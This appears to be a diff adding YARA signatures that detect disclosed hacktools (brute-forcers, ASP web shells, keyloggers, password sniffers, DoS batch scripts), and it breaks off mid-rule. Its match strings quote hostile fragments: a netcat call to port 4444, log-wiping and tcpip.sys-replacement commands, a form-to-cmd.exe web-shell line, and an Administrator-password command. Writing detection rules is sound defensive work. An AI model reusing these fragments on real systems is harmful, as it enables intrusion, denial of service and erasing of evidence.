+ $s0 = "for /f %%a in (host.txt) do (" fullword ascii
+ $s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
+ $s2 = "del host.txt /q" fullword ascii
+ $s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
+ $s4 = "start Http.exe %%a %http%" fullword ascii
+ $s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
+ condition:
+ 5 of them
+}
+
+rule Hacktools_CN_Panda_Burst {
+ meta:
+ description = "Disclosed hacktool set - file Burst.rar"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "ce8e3d95f89fb887d284015ff2953dbdb1f16776"
+ strings:
+ $s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr." ascii
+ condition:
+ all of them
+}
+
+rule Hacktools_CN_445_cmd {
+ meta:
+ description = "Disclosed hacktool set - file cmd.bat"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "69b105a3aec3234819868c1a913772c40c6b727a"
+ strings:
+ $bat = "@echo off" fullword ascii
+ $s0 = "cs.exe %1" fullword ascii
+ $s2 = "nc %1 4444" fullword ascii
+ condition:
+ $bat at 0 and all of ($s*)
+}
+
+rule Hacktools_CN_GOGOGO_Bat {
+ meta:
+ description = "Disclosed hacktool set - file GOGOGO.bat"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "4bd4f5b070acf7fe70460d7eefb3623366074bbd"
+ strings:
+ $s0 = "for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%x" fullword ascii
+ $s1 = "http://www.tzddos.com/ -------------------------------------------->byebye.txt" fullword ascii
+ $s2 = "ren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bak" fullword ascii
+ $s4 = "IF /I \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )" fullword ascii
+ $s5 = "copy *.tzddos scan.bat&del *.tzddos" fullword ascii
+ $s6 = "del /f tcpip.sys" fullword ascii
+ $s9 = "if /i \"%CB%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )" fullword ascii
+ $s10 = "call scan.bat" fullword ascii
+ $s12 = "IF /I \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )" fullword ascii
+ $s13 = "IF /I \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )" fullword ascii
+ $s18 = "sc config LmHosts start= auto" fullword ascii
+ $s19 = "copy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nul" fullword ascii
+ $s20 = "ren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak" fullword ascii
+ condition:
+ 3 of them
+}
+
+rule Hacktools_CN_Burst_pass {
+ meta:
+ description = "Disclosed hacktool set - file pass.txt"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "55a05cf93dbd274355d798534be471dff26803f9"
+ strings:
+ $s0 = "123456.com" fullword ascii
+ $s1 = "123123.com" fullword ascii
+ $s2 = "360.com" fullword ascii
+ $s3 = "123.com" fullword ascii
+ $s4 = "juso.com" fullword ascii
+ $s5 = "sina.com" fullword ascii
+ $s7 = "changeme" fullword ascii
+ $s8 = "master" fullword ascii
+ $s9 = "google.com" fullword ascii
+ $s10 = "chinanet" fullword ascii
+ $s12 = "lionking" fullword ascii
+ condition:
+ all of them
+}
+
+rule Hacktools_CN_JoHor_Posts_Killer {
+ meta:
+ description = "Disclosed hacktool set - file JoHor_Posts_Killer.exe"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "d157f9a76f9d72dba020887d7b861a05f2e56b6a"
+ strings:
+ $s0 = "Multithreading Posts_Send Killer" fullword ascii
+ $s3 = "GET [Access Point] HTTP/1.1" fullword ascii
+ $s6 = "The program's need files was not exist!" fullword ascii
+ $s7 = "JoHor_Posts_Killer" fullword wide
+ $s8 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
+ $s10 = " ( /s ) :" fullword ascii
+ $s11 = "forms.vbp" fullword ascii
+ $s12 = "forms.vcp" fullword ascii
+ $s13 = "Software\\FlySky\\E\\Install" fullword ascii
+ condition:
+ 5 of them
+}
+
+rule Hacktools_CN_JoHor_Rdos_3_6_uplis {
+ meta:
+ description = "Disclosed hacktool set - file uplis.vbp"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "a87d00d78838c2d968b72330ee6f21f69b2caae5"
+ strings:
+ $s0 = "http://dywt.com.cn" fullword ascii
+ $s1 = "service@dywt.com.cn" fullword ascii
+ $s4 = "GetNewInf" fullword ascii
+ $s5 = "This is a runtime library file for EPL applications. The EPL is a software devel" ascii
+ $s8 = "yiyuyan" fullword ascii
+ condition:
+ 4 of them
+}
+
+rule Hacktools_CN_Panda_tesksd {
+ meta:
+ description = "Disclosed hacktool set - file tesksd.jpg"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "922147b3e1e6cf1f5dd5f64a4e34d28bdc9128cb"
+ strings:
+ $s0 = "name=\"Microsoft.Windows.Common-Controls\" " fullword ascii
+ $s1 = "ExeMiniDownload.exe" fullword wide
+ $s16 = "POST %Hs" fullword ascii
+ condition:
+ all of them
+}
+
+rule Hacktools_CN_Panda_k {
+ meta:
+ description = "Disclosed hacktool set - file k.exe"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "8d1170df533238ac2da7826bd8997917be1e1517"
+ strings:
+ $s0 = "(http://www.eyuyan.com)" fullword wide
+ $s1 = "trin" fullword wide
+ $s2 = "FAUL" fullword wide
+ $s10 = " program must be run " fullword ascii
+ condition:
+ all of them
+}
+
+rule Hacktools_CN_Http {
+ meta:
+ description = "Disclosed hacktool set - file Http.exe"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "788bf0fdb2f15e0c628da7056b4e7b1a66340338"
+ strings:
+ $s0 = "RPCRT4.DLL" fullword ascii
+ $s1 = "WNetAddConnection2A" fullword ascii
+ $s2 = "NdrPointerBufferSize" fullword ascii
+ $s3 = "_controlfp" fullword ascii
+ condition:
+ all of them and filesize < 10KB
+}
+
+rule Hacktools_CN_JoHor_Rdos_get {
+ meta:
+ description = "Disclosed hacktool set - file get.vbp"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "09c32ca167136a17fd69df8c525ea5ffeca6c534"
+ strings:
+ $s1 = "http://dywt.com.cn" fullword ascii
+ $s2 = "service@dywt.com.cn" fullword ascii
+ $s3 = "Uncompress" fullword ascii
+ $s5 = "GetNewInf" fullword ascii
+ $s6 = "This is a runtime library file for EPL applications. The EPL is a software devel" ascii
+ $s10 = "GetMD5" fullword ascii
+ $s12 = "RSACheck" fullword ascii
+ condition:
+ all of them
+}
+
+rule Hacktools_CN_JoHor_Rdos_LineExp {
+ meta:
+ description = "Disclosed hacktool set - file LineExp.vbp"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "1bd2db477c68cdcba9ae5c3668bd76c51fc12d2e"
+ strings:
+ $s0 = "http://dywt.com.cn" fullword ascii
+ $s1 = "service@dywt.com.cn" fullword ascii
+ $s2 = "EThread.fne" fullword ascii
+ $s3 = "GetNewInf" fullword ascii
+ $s4 = "This is a runtime library file for EPL applications. The EPL is a software devel" ascii
+ $s5 = "CloseThreadHandle" fullword ascii
+ $s6 = "WaitThread" fullword ascii
+ $s8 = "CreateCriticalSection" fullword ascii
+ condition:
+ all of them
+}
+
+rule Hacktools_CN_Burst_Start {
+ meta:
+ description = "Disclosed hacktool set - file Start.bat - DoS tool"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "75d194d53ccc37a68286d246f2a84af6b070e30c"
+ strings:
+ $s0 = "for /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (" fullword ascii
+ $s1 = "Blast.bat /r 600" fullword ascii
+ $s2 = "Blast.bat /l Blast.bat" fullword ascii
+ $s3 = "Blast.bat /c 600" fullword ascii
+ $s4 = "start Clear.bat" fullword ascii
+ $s5 = "del Result.txt" fullword ascii
+ $s6 = "s syn %%i %%j 3306 /save" fullword ascii
+ $s7 = "start Thecard.bat" fullword ascii
+ $s10 = "setlocal enabledelayedexpansion" fullword ascii
+ condition:
+ 5 of them
+}
+
+rule Hacktools_CN_Panda_tasksvr {
+ meta:
+ description = "Disclosed hacktool set - file tasksvr.exe"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "a73fc74086c8bb583b1e3dcfd326e7a383007dc0"
+ strings:
+ $s2 = "Consys21.dll" fullword ascii
+ $s4 = "360EntCall.exe" fullword wide
+ $s15 = "Beijing1" fullword ascii
+ condition:
+ all of them
+}
+rule Hacktools_CN_Burst_Clear {
+ meta:
+ description = "Disclosed hacktool set - file Clear.bat"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "148c574a4e6e661aeadaf3a4c9eafa92a00b68e4"
+ strings:
+ $s0 = "del /f /s /q %systemdrive%\\*.log " fullword ascii
+ $s1 = "del /f /s /q %windir%\\*.bak " fullword ascii
+ $s4 = "del /f /s /q %systemdrive%\\*.chk " fullword ascii
+ $s5 = "del /f /s /q %systemdrive%\\*.tmp " fullword ascii
+ $s8 = "del /f /q %userprofile%\\COOKIES s\\*.* " fullword ascii
+ $s9 = "rd /s /q %windir%\\temp & md %windir%\\temp " fullword ascii
+ $s11 = "del /f /s /q %systemdrive%\\recycled\\*.* " fullword ascii
+ $s12 = "del /f /s /q \"%userprofile%\\Local Settings\\Temp\\*.*\" " fullword ascii
+ $s19 = "del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\" " ascii
+ condition:
+ 5 of them
+}
+
+rule Hacktools_CN_Panda_andrew {
+ meta:
+ description = "Disclosed hacktool set - file andrew.exe - sethc.exe Debugger backdoor"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "abd03ebb08314297b83e6c795cc85bb85e1f4d71"
+ strings:
+ $s0 = "(http://www.eyuyan.com)" fullword wide
+ $s1 = "ClosePrinter" fullword ascii
+ $s18 = "version=\"1.0\" encoding" fullword ascii
+ condition:
+ all of them
+}
+
+rule Hacktools_CN_Burst_Thecard {
+ meta:
+ description = "Disclosed hacktool set - file Thecard.bat"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "50b01ea0bfa5ded855b19b024d39a3d632bacb4c"
+ strings:
+ $s0 = "tasklist |find \"Clear.bat\"||start Clear.bat" fullword ascii
+ $s1 = "Http://www.coffeewl.com" fullword ascii
+ $s2 = "ping -n 2 localhost 1>nul 2>nul" fullword ascii
+ $s3 = "for /L %%a in (" fullword ascii
+ $s4 = "MODE con: COLS=42 lines=5" fullword ascii
+ condition:
+ all of them
+}
+
+rule Hacktools_CN_Burst_Blast {
+ meta:
+ description = "Disclosed hacktool set - file Blast.bat"
+ author = "Florian Roth"
+ date = "17.11.14"
+ score = 60
+ hash = "b07702a381fa2eaee40b96ae2443918209674051"
+ strings:
+ $s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http:" ascii
+ $s1 = "@echo off" fullword ascii
+ condition:
+ all of them
+}
+
+rule VUBrute_VUBrute {
+ meta:
+ description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file VUBrute.exe"
+ author = "Florian Roth"
+ date = "22.11.14"
+ score = 70
+ hash = "166fa8c5a0ebb216c832ab61bf8872da556576a7"
+ strings:
+ $s0 = "Text Files (*.txt);;All Files (*)" fullword ascii
+ $s1 = "http://ubrute.com" fullword ascii
+ $s11 = "IP - %d; Password - %d; Combination - %d" fullword ascii
+ $s14 = "error.txt" fullword ascii
+ condition:
+ all of them
+}
+
+rule DK_Brute {
+ meta:
+ description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file DK Brute.exe"
+ author = "Florian Roth"
+ date = "22.11.14"
+ score = 70
+ reference = "http://goo.gl/xiIphp"
+ hash = "93b7c3a01c41baecfbe42461cb455265f33fbc3d"
+ strings:
+ $s6 = "get_CrackedCredentials" fullword ascii
+ $s13 = "Same port used for two different protocols:" fullword wide
+ $s18 = "coded by fLaSh" fullword ascii
+ $s19 = "get_grbToolsScaningCracking" fullword ascii
+ condition:
+ all of them
+}
+
+rule VUBrute_config {
+ meta:
+ description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file config.ini"
+ author = "Florian Roth"
+ date = "22.11.14"
+ score = 70
+ reference = "http://goo.gl/xiIphp"
+ hash = "b9f66b9265d2370dab887604921167c11f7d93e9"
+ strings:
+ $s2 = "Restore=1" fullword ascii
+ $s6 = "Thread=" ascii
+ $s7 = "Running=1" fullword ascii
+ $s8 = "CheckCombination=" fullword ascii
+ $s10 = "AutoSave=1.000000" fullword ascii
+ $s12 = "TryConnect=" ascii
+ $s13 = "Tray=" ascii
+ condition:
+ all of them
+}
+
+rule sig_238_hunt {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file hunt.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "f9f059380d95c7f8d26152b1cb361d93492077ca"
+ strings:
+ $s1 = "Programming by JD Glaser - All Rights Reserved" fullword ascii
+ $s3 = "Usage - hunt \\\\servername" fullword ascii
+ $s4 = ".share = %S - %S" fullword wide
+ $s5 = "SMB share enumerator and admin finder " fullword ascii
+ $s7 = "Hunt only runs on Windows NT..." fullword ascii
+ $s8 = "User = %S" fullword ascii
+ $s9 = "Admin is %s\\%s" fullword ascii
+ condition:
+ all of them
+}
+
+rule sig_238_listip {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file listip.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "f32a0c5bf787c10eb494eb3b83d0c7a035e7172b"
+ strings:
+ $s0 = "ERROR!!! Bad host lookup. Program Terminate." fullword ascii
+ $s2 = "ERROR No.2!!! Program Terminate." fullword ascii
+ $s4 = "Local Host Name: %s" fullword ascii
+ $s5 = "Packed by exe32pack 1.38" fullword ascii
+ $s7 = "Local Computer Name: %s" fullword ascii
+ $s8 = "Local IP Adress: %s" fullword ascii
+ condition:
+ all of them
+}
+
+rule ArtTrayHookDll {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file ArtTrayHookDll.dll"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "4867214a3d96095d14aa8575f0adbb81a9381e6c"
+ strings:
+ $s0 = "ArtTrayHookDll.dll" fullword ascii
+ $s7 = "?TerminateHook@@YAXXZ" fullword ascii
+ condition:
+ all of them
+}
+
+rule sig_238_eee {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file eee.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "236916ce2980c359ff1d5001af6dacb99227d9cb"
+ strings:
+ $s0 = "szj1230@yesky.com" fullword wide
+ $s3 = "C:\\Program Files\\DevStudio\\VB\\VB5.OLB" fullword ascii
+ $s4 = "MailTo:szj1230@yesky.com" fullword wide
+ $s5 = "Command1_Click" fullword ascii
+ $s7 = "software\\microsoft\\internet explorer\\typedurls" fullword wide
+ $s11 = "vb5chs.dll" fullword ascii
+ $s12 = "MSVBVM50.DLL" fullword ascii
+ condition:
+ all of them
+}
+
+rule aspbackdoor_asp4 {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file asp4.txt"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "faf991664fd82a8755feb65334e5130f791baa8c"
+ strings:
+ $s0 = "system.dll" fullword ascii
+ $s2 = "set sys=server.CreateObject (\"system.contral\") " fullword ascii
+ $s3 = "Public Function reboot(atype As Variant)" fullword ascii
+ $s4 = "t& = ExitWindowsEx(1, atype)" ascii
+ $s5 = "atype=request(\"atype\") " fullword ascii
+ $s7 = "AceiveX dll" fullword ascii
+ $s8 = "Declare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal " ascii
+ $s10 = "sys.reboot(atype)" fullword ascii
+ condition:
+ all of them
+}
+
+rule aspfile1 {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file aspfile1.asp"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "77b1e3a6e8f67bd6d16b7ace73dca383725ac0af"
+ strings:
+ $s0 = "' -- check for a command that we have posted -- '" fullword ascii
+ $s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword ascii
+ $s5 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><BODY>" fullword ascii
+ $s6 = "<input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">" fullword ascii
+ $s8 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword ascii
+ $s15 = "szCMD = Request.Form(\".CMD\")" fullword ascii
+ condition:
+ 3 of them
+}
+
+rule EditServer {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file EditServer.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "87b29c9121cac6ae780237f7e04ee3bc1a9777d3"
+ strings:
+ $s0 = "%s Server.exe" fullword ascii
+ $s1 = "Service Port: %s" fullword ascii
+ $s2 = "The Port Must Been >0 & <65535" fullword ascii
+ $s8 = "3--Set Server Port" fullword ascii
+ $s9 = "The Server Password Exceeds 32 Characters" fullword ascii
+ $s13 = "Service Name: %s" fullword ascii
+ $s14 = "Server Password: %s" fullword ascii
+ $s17 = "Inject Process Name: %s" fullword ascii
+
+ $x1 = "WinEggDrop Shell Congirator" fullword ascii
+ condition:
+ 5 of ($s*) or $x1
+}
+
+rule sig_238_letmein {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file letmein.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "74d223a56f97b223a640e4139bb9b94d8faa895d"
+ strings:
+ $s1 = "Error get globalgroup memebers: NERR_InvalidComputer" fullword ascii
+ $s6 = "Error get users from server!" fullword ascii
+ $s7 = "get in nt by name and null" fullword ascii
+ $s16 = "get something from nt, hold by killusa." fullword ascii
+ condition:
+ all of them
+}
+
+rule sig_238_token {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file token.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "c52bc6543d4281aa75a3e6e2da33cfb4b7c34b14"
+ strings:
+ $s0 = "Logon.exe" fullword ascii
+ $s1 = "Domain And User:" fullword ascii
+ $s2 = "PID=Get Addr$(): One" fullword ascii
+ $s3 = "Process " fullword ascii
+ $s4 = "psapi.dllK" fullword ascii
+ condition:
+ all of them
+}
+
+rule sig_238_TELNET {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file TELNET.EXE from Windows ME"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "50d02d77dc6cc4dc2674f90762a2622e861d79b1"
+ strings:
+ $s0 = "TELNET [host [port]]" fullword wide
+ $s2 = "TELNET.EXE" fullword wide
+ $s4 = "Microsoft(R) Windows(R) Millennium Operating System" fullword wide
+ $s14 = "Software\\Microsoft\\Telnet" fullword wide
+ condition:
+ all of them
+}
+
+rule snifferport {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file snifferport.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "d14133b5eaced9b7039048d0767c544419473144"
+ strings:
+ $s0 = "iphlpapi.DLL" fullword ascii
+ $s5 = "ystem\\CurrentCorolSet\\" fullword ascii
+ $s11 = "Port.TX" fullword ascii
+ $s12 = "32Next" fullword ascii
+ $s13 = "V1.2 B" fullword ascii
+ condition:
+ all of them
+}
+
+rule sig_238_webget {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file webget.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "36b5a5dee093aa846f906bbecf872a4e66989e42"
+ strings:
+ $s0 = "Packed by exe32pack" ascii
+ $s1 = "GET A HTTP/1.0" fullword ascii
+ $s2 = " error " fullword ascii
+ $s13 = "Downloa" ascii
+ condition:
+ all of them
+}
+
+rule XYZCmd_zip_Folder_XYZCmd {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file XYZCmd.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "bbea5a94950b0e8aab4a12ad80e09b630dd98115"
+ strings:
+ $s0 = "Executes Command Remotely" fullword wide
+ $s2 = "XYZCmd.exe" fullword wide
+ $s6 = "No Client Software" fullword wide
+ $s19 = "XYZCmd V1.0 For NT S" fullword ascii
+ condition:
+ all of them
+}
+
+rule ASPack_Chinese {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file ASPack Chinese.ini"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "02a9394bc2ec385876c4b4f61d72471ac8251a8e"
+ strings:
+ $s0 = "= Click here if you want to get your registered copy of ASPack" fullword ascii
+ $s1 = "; For beginning of translate - copy english.ini into the yourlanguage.ini" fullword ascii
+ $s2 = "E-Mail: shinlan@km169.net" fullword ascii
+ $s8 = "; Please, translate text only after simbol '='" fullword ascii
+ $s19 = "= Compress with ASPack" fullword ascii
+ condition:
+ all of them
+}
+
+rule aspbackdoor_EDIR {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file EDIR.ASP"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "03367ad891b1580cfc864e8a03850368cbf3e0bb"
+ strings:
+ $s1 = "response.write \"<a href='index.asp'>" fullword ascii
+ $s3 = "if Request.Cookies(\"password\")=\"" ascii
+ $s6 = "whichdir=server.mappath(Request(\"path\"))" fullword ascii
+ $s7 = "Set fs = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+ $s19 = "whichdir=Request(\"path\")" fullword ascii
+ condition:
+ all of them
+}
+
+rule sig_238_filespy {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file filespy.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 50
+ hash = "89d8490039778f8c5f07aa7fd476170293d24d26"
+ strings:
+ $s0 = "Hit [Enter] to begin command mode..." fullword ascii
+ $s1 = "If you are in command mode," fullword ascii
+ $s2 = "[/l] lists all the drives the monitor is currently attached to" fullword ascii
+ $s9 = "FileSpy.exe" fullword wide
+ $s12 = "ERROR starting FileSpy..." fullword ascii
+ $s16 = "exe\\filespy.dbg" fullword ascii
+ $s17 = "[/d <drive>] detaches monitor from <drive>" fullword ascii
+ $s19 = "Should be logging to screen..." fullword ascii
+ $s20 = "Filmon: Unknown log record type" fullword ascii
+ condition:
+ 7 of them
+}
+
+rule ByPassFireWall_zip_Folder_Ie {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file Ie.dll"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "d1b9058f16399e182c9b78314ad18b975d882131"
+ strings:
+ $s0 = "d:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dll" fullword ascii
+ $s1 = "LOADER ERROR" fullword ascii
+ $s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+ $s7 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
+ condition:
+ all of them
+}
+
+rule EditKeyLogReadMe {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file EditKeyLogReadMe.txt"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "dfa90540b0e58346f4b6ea12e30c1404e15fbe5a"
+ strings:
+ $s0 = "editKeyLog.exe KeyLog.exe," fullword ascii
+ $s1 = "WinEggDrop.DLL" fullword ascii
+ $s2 = "nc.exe" fullword ascii
+ $s3 = "KeyLog.exe" fullword ascii
+ $s4 = "EditKeyLog.exe" fullword ascii
+ $s5 = "wineggdrop" fullword ascii
+ condition:
+ 3 of them
+}
+
+rule PassSniffer_zip_Folder_readme {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file readme.txt"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "a52545ae62ddb0ea52905cbb61d895a51bfe9bcd"
+ strings:
+ $s0 = "PassSniffer.exe" fullword ascii
+ $s1 = "POP3/FTP Sniffer" fullword ascii
+ $s2 = "Password Sniffer V1.0" fullword ascii
+ condition:
+ 1 of them
+}
+
+rule sig_238_gina {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file gina.reg"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "324acc52566baf4afdb0f3e4aaf76e42899e0cf6"
+ strings:
+ $s0 = "\"gina\"=\"gina.dll\"" fullword ascii
+ $s1 = "REGEDIT4" fullword ascii
+ $s2 = "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]" fullword ascii
+ condition:
+ all of them
+}
+
+rule splitjoin {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "e4a9ef5d417038c4c76b72b5a636769a98bd2f8c"
+ strings:
+ $s0 = "Not for distribution without the authors permission" fullword wide
+ $s2 = "Utility to split and rejoin files.0" fullword wide
+ $s5 = "Copyright (c) Angus Johnson 2001-2002" fullword wide
+ $s19 = "SplitJoin" fullword wide
+ condition:
+ all of them
+}
+
+rule EditKeyLog {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file EditKeyLog.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "a450c31f13c23426b24624f53873e4fc3777dc6b"
+ strings:
+ $s1 = "Press Any Ke" fullword ascii
+ $s2 = "Enter 1 O" fullword ascii
+ $s3 = "Bon >0 & <65535L" fullword ascii
+ $s4 = "--Choose " fullword ascii
+ condition:
+ all of them
+}
+
+rule PassSniffer {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file PassSniffer.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "dcce4c577728e8edf7ed38ac6ef6a1e68afb2c9f"
+ strings:
+ $s2 = "Sniff" fullword ascii
+ $s3 = "GetLas" fullword ascii
+ $s4 = "VersionExA" fullword ascii
+ $s10 = " Only RuntUZ" fullword ascii
+ $s12 = "emcpysetprintf\\" fullword ascii
+ $s13 = "WSFtartup" fullword ascii
+ condition:
+ all of them
+}
+
+rule aspfile2 {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file aspfile2.asp"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "14efbc6cb01b809ad75a535d32b9da4df517ff29"
+ strings:
+ $s0 = "response.write \"command completed success!\" " fullword ascii
+ $s1 = "for each co in foditems " fullword ascii
+ $s3 = "<input type=text name=text6 value=\"<%= szCMD6 %>\"><br> " fullword ascii
+ $s19 = "<title>Hello! Welcome </title>" fullword ascii
+ condition:
+ all of them
+}
+
+rule Jc_ALL_WinEggDropShell_rar_Folder_SOCKS {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file SOCKS.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "ad2168e9837592eeb120fc6798648b2fe996f79c"
+ strings:
+ $s0 = "http://go.163.com/~sdemo" fullword ascii
+ $s1 = "http://go.163.com/sdemo" fullword wide
+ $s4 = "Player.EXE" fullword wide
+ $s5 = "mailto:sdemo@263.net" fullword ascii
+ $s6 = "S-Player.exe" fullword ascii
+ condition:
+ all of them
+}
+
+rule UnPack_rar_Folder_InjectT {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "80f39e77d4a34ecc6621ae0f4d5be7563ab27ea6"
+ strings:
+ $s0 = "%s -Install -->To Install The Service" fullword ascii
+ $s1 = "Explorer.exe" fullword ascii
+ $s2 = "%s -Start -->To Start The Service" fullword ascii
+ $s3 = "%s -Stop -->To Stop The Service" fullword ascii
+ $s4 = "The Port Is Out Of Range" fullword ascii
+ $s7 = "Fail To Set The Port" fullword ascii
+ $s11 = "\\psapi.dll" fullword ascii
+ $s20 = "TInject.Dll" fullword ascii
+
+ $x1 = "Software\\Microsoft\\Internet Explorer\\WinEggDropShell" fullword ascii
+ $x2 = "injectt.exe" fullword ascii
+ condition:
+ ( 1 of ($x*) ) and ( 3 of ($s*) )
+}
+
+rule Jc_WinEggDrop_Shell {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "820674b59f32f2cf72df50ba4411d7132d863ad2"
+ strings:
+ $s0 = "Sniffer.dll" fullword ascii
+ $s4 = ":Execute net.exe user Administrator pass" fullword ascii
+ $s5 = "Fport.exe or mport.exe " fullword ascii
+ $s6 = ":Password Sniffering Is Running |Not Running " fullword ascii
+ $s9 = ": The Terminal Service Port Has Been Set To NewPort" fullword ascii
+ $s15 = ": Del www.exe " fullword ascii
+ $s20 = ":Dir *.exe " fullword ascii
+ condition:
+ 2 of them
+}
+
+rule aspbackdoor_asp1 {
+ meta:
+ description = "Disclosed hacktool set (old stuff) - file asp1.txt"
+ author = "Florian Roth"
+ date = "23.11.14"
+ score = 60
+ hash = "9ef9f34392a673c64525fcd56449a9fb1d1f3c50"
+ strings:
+ $s0 = "param = \"driver={Microsoft Access Driver (*.mdb)}\" " fullword ascii
+ $s1 = "conn.Open param & \";dbq=\" & Server.MapPath(\"scjh.mdb\") " fullword ascii
+ $s6 = "set rs=conn.execute (sql)%> " fullword ascii
